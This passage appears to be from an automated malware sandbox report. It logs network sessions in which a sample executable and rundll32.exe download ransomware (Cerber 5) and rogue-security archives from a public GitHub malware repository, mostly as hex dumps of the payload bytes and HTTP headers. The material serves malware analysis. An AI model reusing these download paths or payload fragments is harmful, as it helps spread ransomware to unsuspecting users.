                                                                                                                                                            2022-09-29 12:45:20 UTC29481INData Raw: 0b ce fc 85 5b 6c 95 9f d8 4b eb 4b 85 9b 3c 69 e6 a4 7b 1c 5b 64 a6 cd 1e 37 19 7d 4b 9c 83 4a 6b d8 b0 16 b5 e1 fb 81 da b9 b5 78 3a c2 17 94 90 40 25 61 32 71 5e 9b d7 05 ff 60 56 48 8b ff 08 f6 aa fe b4 06 00 12 e5 e0 6a 53 3e 12 e2 d7 25 55 12 40 e5 b9 b5 8d bc 4b e0 ea e0 f5 f5 08 da 86 d8 85 f1 8c ef 09 5c e5 c9 f7 82 21 b7 f8 f9 13 0c b9 e6 db 61 e6 f1 91 ca 8f d9 b3 d2 86 f3 2f 27 41 ba ac 5f 4f a5 7c dd bd 37 e8 b0 0a 53 13 89 f2 a1 d1 e1 83 a7 f2 0c 92 33 4b 69 56 a5 d2 55 65 f6 9f 54 55 f0 0d fa ee 92 6a 36 89 09 6c 22 fa 1c 86 41 ac f3 5a 21 3e f7 91 55 22 f4 5d b1 e1 9e 5c 6f 8d b6 28 a3 df c2 a1 06 7a 9f 54 5f e8 b1 c8 09 43 c6 09 94 63 c9 f0 67 92 d8 bf 7f 0c 34 a8 dc 00 5a 51 bb bd 84 78 ac d0 71 68 05 a5 8d a2 7f fb d5 bd 30 b3 1e d7 fb
                                                                                                                                                            Data Ascii: [lKK<i{[d7}KJkx:@%a2q^`VHjS>%U@K\!a/'A_O|7S3KiVUeTUj6l"AZ!>U"]\o(zT_Ccg4ZQxqh0
                                                                                                                                                            2022-09-29 12:45:20 UTC29497INData Raw: 95 7e ab d6 f1 0d a3 3d ee eb 95 f1 82 69 18 89 a2 2f 25 0b 55 ca 3f ed d3 e5 83 cd 78 a4 0f 4d 1f 66 5a 1a 22 86 36 5b 43 09 ea ba 09 ab 7a dc 47 69 d0 ce 27 e1 60 b8 f9 9f e7 82 70 b0 f7 45 dc 57 fd 89 a1 5b 7e e0 43 32 2f 9c ce cd 20 5d 47 36 14 4f 30 9c e6 4e 1a 4b 2f 07 63 85 19 61 6f 53 50 d5 dc 91 f1 61 bf 61 e0 8f fd 78 d7 7b 4e 1e 3b 16 42 16 fc da 8f b5 34 f7 18 3e 9f 2b 2e c3 fa 66 ac 42 f6 ad f8 c6 b3 1c 62 4d d2 64 2b b4 7e 52 ae f1 94 a0 b0 29 f0 cf dd d0 aa 05 e7 45 02 bf a4 be ba a3 d2 61 8c c5 b7 6e db 94 a3 d7 03 0c b2 f7 5f 91 6a f3 f3 2b 15 cf fc 12 95 c2 7f 9c 25 49 b1 2c 96 83 d2 da 04 9c a3 f6 fb 17 86 b0 2b a4 b3 23 2b 68 ab 47 67 18 46 21 b6 d2 4c 64 f0 24 57 cc c4 20 a9 f2 db b5 54 b0 74 da c6 d7 a6 2b 47 2a e1 b9 2c c4 a6 37 7a
                                                                                                                                                            Data Ascii: ~=i/%U?xMfZ"6[CzGi'`pEW[~C2/ ]G6O0NK/caoSPaax{N;B4>+.fBbMd+~R)Ean_j+%I,+#+hGgF!Ld$W Tt+G*,7z
                                                                                                                                                            2022-09-29 12:45:20 UTC29513INData Raw: 85 2a 04 a2 68 87 44 52 fa b9 ac 89 d0 af 6b 95 a4 71 89 04 55 ed 3e bd ee 7c c3 ee a3 ca 67 21 14 30 a3 39 0d 1a dc 9c ff 55 54 dc 3f e7 75 13 90 ac 43 e9 03 85 96 c0 8c bd 5d 19 2d 09 cb f3 a9 14 96 31 84 af 9a 49 4d 2c 82 c0 ca 07 a0 80 0c 57 da b1 c2 6a b5 02 24 6c ec 64 b2 04 3b 39 6d 0d a8 51 ff 99 c2 e5 76 63 ce 53 3b 5a 42 d9 07 6d 32 2e c5 d7 7c 2e ff 96 17 dc 78 f2 79 26 82 21 93 ce dc 2b 8e dc 65 d6 57 86 d6 90 44 3a 71 79 3d 98 4f c2 17 df 37 35 86 63 7f ba 03 1b c5 5b 28 c0 ba ec 24 21 c5 60 27 07 ca 36 6a 89 fc 77 96 5b 27 9a 2a 36 3b ad e4 27 4a 6b eb b6 0f 20 75 e6 35 21 4a 83 09 f9 fd fb a7 7d ea 84 49 1a 00 05 b1 86 6c 00 91 eb 89 2a 38 4c c8 da 7b 87 1a db df 20 2d a8 24 6c 99 87 e2 1b d3 62 ee b5 02 92 30 f7 33 23 7f bb c5 96 26 52 7d
                                                                                                                                                            Data Ascii: *hDRkqU>|g!09UT?uC]-1IM,Wj$ld;9mQvcS;ZBm2.|.xy&!+eWD:qy=O75c[($!`'6jw['*6;'Jk u5!J}Il*8L{ -$lb03#&R}
                                                                                                                                                            2022-09-29 12:45:20 UTC29529INData Raw: 1c 96 a0 5c c4 9c 6a 36 6c 92 1a f9 28 83 43 b6 7b 55 66 30 0e d5 f8 1d 4b ea 0c 6d 21 a7 e8 9a cd c5 16 cb ab 05 b7 5f 87 01 5e 74 cb 3e d7 06 39 b8 3f 16 70 8c 21 6a 23 7f 73 02 65 94 e0 9e 77 fe e2 25 f4 fe 69 ca d0 a8 eb 32 ea 3b f3 c6 03 b8 22 ef 93 82 c2 b2 d2 b3 46 31 32 0e b8 1b 69 1e 73 7c 6a 0d 8e c1 4f a5 a5 3e 32 ef 89 ab b8 a1 40 2d 29 9b 4d 29 98 de 59 d1 02 87 14 ff 93 6a 2e 12 10 c8 53 f9 0c ab 14 4d 7c ff 06 c5 77 e7 a8 c1 ac 2e 23 ca db 3b 87 bc c5 d6 18 5b 1f 25 22 d0 4b a2 47 3d 35 26 65 4e 53 f4 3f 2b ac b0 ee 34 af d8 ec 10 40 36 d2 48 c1 a4 5e 40 c5 ec 96 4d 3c 0c 6f cd 67 95 79 da 7d 76 76 b9 c3 96 8f 27 25 56 78 1d 0b 53 07 35 b0 cb d3 db 98 e7 68 cd 64 dd bd f3 4c de 2c cd 34 d3 7b c4 4c 42 6a 4e e6 2a b2 6a 5d bb 52 61 53 cc 3d
                                                                                                                                                            Data Ascii: \j6l(C{Uf0Km!_^t>9?p!j#sew%i2;"F12is|jO>2@-)M)Yj.SM|w.#;[%"KG=5&eNS?+4@6H^@M<ogy}vv'%VxS5hdL,4{LBjN*j]RaS=
                                                                                                                                                            2022-09-29 12:45:20 UTC29545INData Raw: 1e a7 ea 14 49 2a 9b f1 cd c3 b8 78 80 92 43 e7 c6 77 f8 55 cb 83 0f d9 bb 35 df d7 50 63 d2 54 9c 75 2e 2e 51 26 56 34 95 76 c9 17 6d 5c b8 7f d4 e8 77 78 51 6b 2a 9c 78 e8 d3 a1 b8 48 7a b3 eb be 8c f2 3e 09 ae 2e 46 c1 ef 35 7b cf 1c 9d 2c fc a1 80 a9 71 ed e9 a3 ed 9a b4 5a c7 35 ab 79 2a 3c e0 b8 a2 48 1d ba c1 d4 c7 a5 d1 e0 70 0d 85 37 b8 25 ae ae 37 70 e2 a6 5a 74 62 3d c2 80 3a 8e 34 47 6e 07 9e 39 f2 01 30 38 01 f3 b9 71 7a f3 37 1e f6 8c 67 ce d6 47 5c 80 e7 9b 64 41 6a 8c 53 f6 f4 42 af 54 e7 92 f0 3c e1 a6 bb f2 de 63 f3 22 82 d5 19 0a 51 4e 79 a6 f6 0c a6 41 e8 8d f3 93 b5 f7 fd 0a 1c 37 4a c9 69 0f 45 06 bc 2e 49 78 d2 57 ac a0 40 36 68 e1 42 30 c2 9f c0 82 2c e2 d1 c8 64 dd de 20 6c 3f 7f f8 46 1e c4 ea 41 4a 8c 46 50 ef 14 83 bf c0 63 51
                                                                                                                                                            Data Ascii: I*xCwU5PcTu..Q&V4vm\wxQk*xHz>.F5{,qZ5y*<Hp7%7pZtb=:4Gn908qz7gG\dAjSBT<c"QNyA7JiE.IxW@6hB0,d l?FAJFPcQ
                                                                                                                                                            2022-09-29 12:45:20 UTC29561INData Raw: 80 3b 0b 31 16 78 2e 4a b6 f6 7f 30 66 f5 3f 13 ff 91 41 ab b6 5d 9e 0d 74 96 07 53 82 96 16 05 18 e5 25 b9 09 91 0c 1b 24 58 93 45 ab ad 74 43 90 b5 0a c4 18 d0 98 fe cc 08 2c 88 4f 84 5d 20 a0 ed e6 b1 d1 b8 50 c2 38 8f 18 c1 05 36 b9 59 ac 51 5e 77 6f 75 d6 e8 c4 a0 41 a9 75 6b d6 f7 7a 7c 78 cc 1c cb b8 e6 7c 63 5f 81 2e 4d 5a d9 4a d5 85 14 c2 28 7d fe 0d 1c 6a 53 a7 22 13 8c f5 8e 75 d7 b6 e4 ef 09 e8 4d c5 3d b9 5e 21 ce 37 01 a4 a8 7a 59 05 39 32 41 32 21 2f 1b 6f 33 3d ab 59 87 2e 33 7b 06 1e 4e e5 dd 10 16 b1 41 45 f7 27 76 24 d4 71 29 04 8f ea 05 aa 10 53 56 a3 e3 60 48 f5 41 24 c2 e9 dc 79 c8 b0 bb 56 91 43 92 e3 49 a0 ca f8 e0 9b 9c e0 2f 84 9b 81 99 ed 90 37 0b 94 58 b0 ec 5f a5 60 d5 1b 0e a8 ea 8d 62 2a 6e a4 3b 2b df 8b 44 0f d5 4f bd 5b
                                                                                                                                                            Data Ascii: ;1x.J0f?A]tS%$XEtC,O] P86YQ^wouAukz|x|c_.MZJ(}jS"uM=^!7zY92A2!/o3=Y.3{NAE'v$q)SV`HA$yVCI/7X_`b*n;+DO[
                                                                                                                                                            2022-09-29 12:45:20 UTC29577INData Raw: 90 61 f8 85 63 4b e1 82 91 32 f7 5d 5b 29 33 f5 1e 25 ea 2b 02 9e eb 33 26 11 4c b3 ae ac 5c f5 c6 57 66 ff d3 a4 93 99 16 5a 93 bf 7a 42 ab 30 6a 53 1b c5 e4 2c bd c0 5a 45 b8 98 56 de bc e3 af b7 42 f4 1b 66 a0 f0 26 ee d6 67 83 75 1e 68 ba d8 7b 23 d3 9d d9 c5 17 55 83 ef 87 61 44 88 9a a0 7f 57 88 f1 8e eb f6 7e 0d 69 81 21 8f 7e 22 0b cf e7 0a 65 54 28 bd f5 3d df 88 e6 90 83 a3 30 06 19 48 fe 28 8e b5 07 38 0a df f1 b2 a6 d2 9f 1f b6 ea eb 11 f8 66 d8 25 5b 05 af 41 d7 f9 9a f3 5c 38 59 86 c9 7e 7c 91 46 9d 98 a1 a2 94 a2 33 34 96 f9 f8 30 e3 2f ea 09 51 b8 cc 58 01 35 fb 2d 9e 3c 58 ba d1 02 0e dc cd d6 98 2a 55 29 1d e7 28 95 73 4d 88 c2 67 39 a5 58 25 9e 6e 5f 7a 9c 4f 66 dd 66 2d eb 48 f8 c3 2f 22 78 d7 fb 7e 33 a5 aa 39 60 74 f0 1a 1a 80 a9 eb
                                                                                                                                                            Data Ascii: acK2][)3%+3&L\WfZzB0jS,ZEVBf&guh{#UaDW~i!~"eT(=0H(8f%[A\8Y~|F340/QX5-<X*U)(sMg9X%n_zOff-H/"x~39`t
                                                                                                                                                            2022-09-29 12:45:20 UTC29593INData Raw: 6c ed e9 7e d3 72 03 49 ae 1b 11 0b 49 ca 98 3d 75 38 24 1d 26 eb 91 2b 2f 48 7f c1 e4 fc 53 d6 0d 1e 4f 1e 4f 56 87 1e 15 29 85 9a e9 71 2d 74 2e 08 ec 33 64 78 b2 d2 df a0 0c a6 e5 60 8b 57 3b 12 0f 55 6b 64 fe 0d a2 ae fb c0 cc 82 98 d9 60 ed 21 e7 0e b4 9b b8 d0 50 d8 4f da 94 fc b3 06 3a b9 a5 82 9c fc 67 f9 98 f4 46 95 9f 9f 58 ed ac ee ed e2 25 b8 04 1a 05 2b 76 59 8d 90 56 60 8c f4 0f a4 95 cf 04 b2 f2 33 4e 62 fa 1f 4f 53 f5 09 87 b2 f7 fc e0 53 75 ad ec 22 69 24 2a a9 63 f9 1b ef e6 e0 fe 36 d9 10 93 d9 fd c8 25 00 e7 39 26 73 b0 d7 4c e5 94 96 da df 9f aa 5e 46 15 90 8e 64 f7 a1 ab a2 f0 63 6d f0 83 ff 71 24 0f f7 47 d1 5d ed 21 25 7e 90 f4 eb 2a 0b b8 b9 1a 49 5d 6d f5 5e b0 cb 21 b2 56 04 af 09 c5 52 08 7a 1c 38 61 e3 91 fc d6 a9 ca 00 72 90
                                                                                                                                                            Data Ascii: l~rII=u8$&+/HSOOV)q-t.3dx`W;Ukd`!PO:gFX%+vYV`3NbOSSu"i$*c6%9&sL^Fdcmq$G]!%~*I]m^!VRz8ar
                                                                                                                                                            2022-09-29 12:45:20 UTC29609INData Raw: 55 f7 06 81 b2 e0 10 43 43 d2 42 79 e6 e4 3d 57 a7 51 8b 8a 3d cc 70 8e 91 17 37 de 67 0c 60 05 96 5d 92 b9 30 81 ea 25 bc dc a6 b4 97 f5 48 f2 b5 01 b7 fa 55 78 73 15 8f ae f9 08 90 5f e5 e9 b9 5d ee 2a bf 1d f8 c3 29 27 75 a9 fc 26 88 40 77 da 12 ab 27 53 fc f4 11 a2 b6 3e b9 91 b1 4f d2 4b 0a 26 a5 d1 42 e3 c2 31 f2 22 7b c2 23 2f 36 da d6 a3 81 fc 3e b1 93 fe a2 b2 e7 63 78 5c 0b 02 7e 42 7f 92 7c 14 5c c3 89 aa b8 04 91 2e 8a c7 5a 26 21 b0 07 cd 62 7a f5 c8 8e f6 84 67 df 6e 3d d9 2c 93 43 09 a8 bd 07 b7 5e d6 64 db ba 72 3b 3a be 10 53 ac 05 98 46 f6 e5 0e e7 e9 6f cc 5b 6d 00 26 57 25 b6 90 c0 9c 21 43 c9 be 7e bd de 48 99 4b fb c8 ed 80 e2 2e 75 d3 41 4a af 35 79 f5 1f 4b 7b f2 ee ee 76 4d 01 13 fc 2c a2 a0 c6 60 cc 17 c0 06 a0 d0 31 99 b4 a6 73
                                                                                                                                                            Data Ascii: UCCBy=WQ=p7g`]0%HUxs_]*)'u&@w'S>OK&B1"{#/6>cx\~B|\.Z&!bzgn=,C^dr;:SFo[m&W%!C~HK.uAJ5yK{vM,`1s
                                                                                                                                                            2022-09-29 12:45:20 UTC29625INData Raw: e5 8f 44 eb 38 c0 0a 7c dd 08 bf b3 c2 73 38 0c 47 1c 2d b0 ca 41 25 16 11 0e 25 1d ed 57 6a 67 27 e8 71 24 7c f8 65 37 42 e0 0d 38 cf 82 d0 f3 72 9a 42 47 10 de 22 98 39 fd ec 61 ad 28 fb 12 64 95 0d 1a ad a5 a1 d5 59 43 e9 b4 a4 d3 89 02 3b 82 cd 01 15 9f d8 df 0f 29 8a 2e 9c 37 a3 37 df 29 4a 1c 93 ef 68 2f 86 c5 9e a9 fc bc 73 01 f9 56 a3 c5 0f ab 28 88 02 19 2b 56 bb 97 e8 d6 38 29 70 aa b1 5f 62 39 94 a7 ad 4a c3 23 ce 07 cd 88 a1 53 6c ff c6 31 e7 48 a4 e1 8a 6f ae f2 1f fb 2d 11 ac 45 64 25 4f d0 4a e8 b5 cb ea 6b 34 24 bd 16 ad e6 e4 04 3e fc 39 0e 28 ca bf fd d9 cd 0e d9 93 ac c7 6a 9d 87 f8 d3 61 8d e8 54 bf 21 04 e9 96 80 35 99 da 51 a4 f9 84 e9 54 c2 b9 9f 1c e2 8c ee 4b 61 ca 0b 0f 9d e0 b2 56 7b 97 e3 27 44 f7 b1 d6 5f 4d 4c 43 da 67 14 d3
                                                                                                                                                            Data Ascii: D8|s8G-A%%Wjg'q$|e7B8rBG"9a(dYC;).77)Jh/sV(+V8)p_b9J#Sl1Ho-Ed%OJk4$>9(jaT!5QTKaV{'D_MLCg


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            11140.82.121.4443192.168.2.649713C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:47 UTC514INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:47 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:44:47 UTC515INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            110192.168.2.649763140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:21 UTC29635OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            111140.82.121.4443192.168.2.649763C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:21 UTC29635INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:10 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:21 UTC29636INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            112192.168.2.649764185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:21 UTC29637OUTGET /Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            113185.199.110.133443192.168.2.649764C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:21 UTC29637INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 904153
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "8e55325d7d02c8c00d68591213067b37bcdc1e53f173bbf25946b78df6ae59e8"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 083B:E9DE:2DF92:A5F15:63359361
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:21 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6923-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455521.172648,VS0,VE764
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: c022ccca792e9a111e99a436aa99f5bd4a2d242e
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:21 GMT
                                                                                                                                                            Source-Age: 1
                                                                                                                                                            2022-09-29 12:45:21 UTC29638INData Raw: 50 4b 03 04 14 00 01 00 08 00 50 44 9a 45 d8 2f 25 f2 17 cb 0d 00 00 22 0e 00 1e 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 43 65 6e 74 72 61 6c 2e 65 78 65 93 de 92 39 11 16 14 a3 28 f7 f0 f1 f9 49 df 84 3b 78 1e 78 4b eb e8 c8 8b 76 80 1b 30 bf 6b 3d ab 93 0f 3b d1 ef 05 65 57 77 36 bc 87 bf 0d 4b 10 58 f5 50 56 15 5e 92 26 62 a3 82 cb a0 49 4c 04 31 fb 16 a4 f4 c6 30 4f 20 6a 2a 9f 49 18 c9 db 96 6e e6 d7 0f d5 79 dd 88 92 62 e7 2c c6 f3 0a 78 2d 00 ff 80 51 8d ca 38 dd a4 d8 b3 84 a1 fd 9b 28 af 70 32 ca fd 27 e6 7a cb d0 b2 4d 1a 66 28 88 ef 52 28 b9 74 da b4 57 29 20 23 85 b8 16 ff 02 b8 15 7d be 8a e2 35 e6 f3 4b 05 d8 97 1d 8c 51 67 97 90 1f ef 8f 05 7b 11 b5 58 ce 4a 44 bf c8 79 1e 44 09 b4 29 96 5c 11 85 c6 e8 88 54 8b 99
                                                                                                                                                            Data Ascii: PKPDE/%"Endermanch@SecurityCentral.exe9(I;xxKv0k=;eWw6KXPV^&bIL10O j*Inyb,x-Q8(p2'zMf(R(tW) #}5KQg{XJDyD)\T
                                                                                                                                                            2022-09-29 12:45:21 UTC29639INData Raw: 32 37 9a a2 75 6e 6a 58 03 9e a0 06 d6 e0 49 c0 47 4e 4f ce 44 4d 71 bb 5d 6d d2 13 d4 60 b2 8c 30 47 01 d7 13 37 49 2f 64 aa e4 c1 84 c4 cb 49 ee 1d f5 7f 36 6f 2f 12 1c b6 f7 25 d3 b4 f9 fe 6c 21 a1 48 2e a8 b2 b7 56 6a 49 1d 4f 91 9f 9f 4c 34 12 e4 bd 21 30 62 c2 16 f6 81 26 9c 0e 93 95 ee 24 53 97 9b a1 08 ad 9f 52 ec 1e 66 05 70 2f 7e f2 ac 72 c3 f7 08 28 9d af 04 7f 74 fe 29 09 e0 69 a0 1f dd dc 9a 66 fe 96 bb 6a 8e 2c c0 73 46 c0 af 47 1c 4f d5 de e7 c8 d0 67 4d 31 26 6b b8 7b 71 fb f4 15 49 8f 89 3e 28 8a ea 8b 2a 3e 83 73 2b a4 2d 3e a8 6a 73 28 c0 bf c2 b8 40 ea e7 e5 8d 47 30 a7 47 08 71 ef 71 2a de 32 9b bb 10 cf be f3 89 14 11 fb c4 96 07 71 b5 14 2b 05 2e a3 25 89 b5 60 c0 fb 10 73 81 80 13 cf d0 e5 ae c6 ad 8a 86 2b c5 8f fd 87 61 ef 4b 64
                                                                                                                                                            Data Ascii: 27unjXIGNODMq]m`0G7I/dI6o/%l!H.VjIOL4!0b&$SRfp/~r(t)ifj,sFGOgM1&k{qI>(*>s+->js(@G0Gqq*2q+.%`s+aKd
                                                                                                                                                            2022-09-29 12:45:21 UTC29641INData Raw: a6 d2 fc 61 2d b6 bb 04 9c 88 23 f2 0b 27 8e d7 29 b0 8d d0 35 09 c4 ba b2 4b e1 50 2e 15 17 d4 5f 89 7b 68 d8 ae e7 c6 63 9a c6 ea 48 aa 0e 36 48 22 41 15 bc 87 cf 55 29 f3 1b 5f 8d f1 72 c1 7e cd 26 87 a0 49 46 bb 75 ad 1e 4e b1 7c 47 c7 4d 56 52 34 e0 22 5f 7d f3 e7 13 df 16 2a 87 6b ee e3 d5 9f b2 df 06 63 f0 e9 e3 d7 bc 46 7a 32 98 fd c2 35 ad 98 5b 23 ba 2e 6b da 18 b2 02 43 47 59 4c f1 89 80 f6 5a 0a 1f 2c 5a b8 49 8f 5f 57 6a d5 25 a9 c4 1d e8 9b a7 7d 92 33 89 8f b4 dc 7a 64 46 f9 c1 46 31 f5 0a ee 47 2b ac 47 f9 e9 c0 d1 02 eb 41 7f a0 53 e3 97 16 19 fc 10 6d e7 2d 80 72 1b e6 3b 27 90 be c1 a8 b3 fb c3 28 22 30 cc d5 62 f1 e4 98 46 6a 32 8b 81 e4 3f 2d e4 30 d0 db 92 f1 43 c0 44 d0 14 72 9f 13 8d 93 9c df 29 fd 1b c4 c7 3d 38 c9 3d 17 82 72 42
                                                                                                                                                            Data Ascii: a-#')5KP._{hcH6H"AU)_r~&IFuN|GMVR4"_}*kcFz25[#.kCGYLZ,ZI_Wj%}3zdFF1G+GASm-r;'("0bFj2?-0CDr)=8=rB
                                                                                                                                                            2022-09-29 12:45:21 UTC29642INData Raw: 0a 74 74 ce 8d ab eb 66 93 fb 75 78 7a 00 0c 7b f3 4a 6b 60 fd 6d 0e c5 18 fc 9d 27 1f 81 a0 92 20 f0 1b 78 a6 7c 08 65 4a c6 0e 7d fa 4d 3c 64 b0 f4 39 e8 0a 4f b1 a8 88 88 38 8d 79 30 05 47 1b b0 b9 88 c5 ff 9c ce b4 de a5 bb 5a 13 3c e6 4f f1 41 1b 3b 1c 7a 2e 3f a9 6a cf f8 ea c0 6a 3e cb a5 8e 5d ae ea 0d 7c 7d 00 46 0c 38 df 5a 69 47 00 99 dc 5e 9f a2 56 e5 95 51 9d 6d 05 bc 7c 3e a6 73 61 48 9a 36 f4 85 0d 83 78 f8 9f 2f 75 f6 74 2a c3 17 8a 79 ff 82 fc 08 f8 c2 a5 87 e1 50 f5 56 89 2b 11 ae 6f 7b 4c 7f ea 9c 70 f8 2f f0 28 0a da 15 5c 85 99 d6 03 62 b0 be 43 86 c5 51 e8 d8 08 60 08 47 21 fd 86 4c ae a3 1d ae cf 5d d5 3d c9 14 a9 0c 2c a7 fa 8e a2 a8 fb 38 71 17 66 3a 93 bf 46 c7 33 f2 ec 4f 76 08 32 44 12 f9 a5 57 44 0e 27 0d 13 3f 62 c7 90 98 47
                                                                                                                                                            Data Ascii: ttfuxz{Jk`m' x|eJ}M<d9O8y0GZ<OA;z.?jj>]|}F8ZiG^VQm|>saH6x/ut*yPV+o{Lp/(\bCQ`G!L]=,8qf:F3Ov2DWD'?bG
